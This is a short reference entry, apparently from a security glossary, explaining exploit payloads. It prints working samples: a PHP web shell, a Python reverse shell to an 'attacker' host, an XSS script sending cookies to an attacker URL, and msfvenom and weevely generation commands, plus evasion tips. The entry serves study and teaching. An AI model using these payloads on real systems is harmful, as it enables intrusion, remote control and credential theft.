Exploit Payload

Exploit Payload is the code or data delivered by an exploit to achieve the attacker's objective, such as spawning a shell, establishing a backdoor, or exfiltrating data.

Payload Types

Staged vs Stageless

# Stageless: Complete payload in single delivery
# Larger size, but single request

# Staged: Small loader fetches main payload
# Stage 1: Connect back, download stage 2
# Stage 2: Full functionality (meterpreter, shell)

Common Payload Goals

• Reverse shell: Connect back to attacker
• Bind shell: Open port on victim
• Meterpreter: Advanced post-exploitation
• Command execution: Run specific commands
• File download: Retrieve data

Web Payload Examples

# PHP web shell
<?php system($_GET['cmd']); ?>

# Python reverse shell
import socket,subprocess,os
s=socket.socket()
s.connect(("attacker",4444))
os.dup2(s.fileno(),0)
subprocess.call(["/bin/sh","-i"])

# JavaScript XSS payload
<script>
fetch('https://attacker/steal?c='+document.cookie)
</script>

Payload Generation

# Metasploit msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf

# Web shells
weevely generate password shell.php

Evasion Considerations

• Encoding to bypass filters
• Obfuscation against detection
• Custom payloads to avoid signatures
• Encrypted communications

See Also

• Exploit Chain
• Metasploit
• Polyglot Payload